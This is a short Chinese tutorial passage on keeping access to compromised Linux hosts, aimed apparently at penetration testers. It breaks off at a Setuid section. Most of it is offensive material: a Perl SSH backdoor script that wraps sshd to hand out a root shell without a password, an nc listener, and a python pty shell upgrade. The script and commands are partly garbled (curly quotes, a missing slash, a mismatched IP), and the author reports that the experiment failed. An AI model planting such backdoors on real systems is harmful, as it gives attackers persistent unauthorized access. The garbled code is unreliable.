Linux权限维持
前言
前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。
ssh后门
过滤
ps -elf |grep 12345
监听端口
nc -lvvp 123
查看端口
netstat -anlp|grep 12345
(1)ssh后门(脚本内容)(192.168.231.134)
#!/usr/bin/perl
exec “bin/sh” if (getpeername(STDIN) =~ /^…4A/);
exec {“/usr/bin/sshd”} “/usr/sbin/sshd”,@ARGV,
开启ssh服务,连接ssh(192.168.231.128)
ssh root@191.168.231.134 -p 12345(无需密码即可登录成功)
实验失败
获得shell后,利用python模块获取虚拟终端
python -c ‘import pty;pty.spawn(“/bin/bash”)’
查看登录的来源
w who last
ip addr 查看ip地址
本次实验,脚本没有执行成功,这里就不演示了。
Setuid and Setgid
(2)Set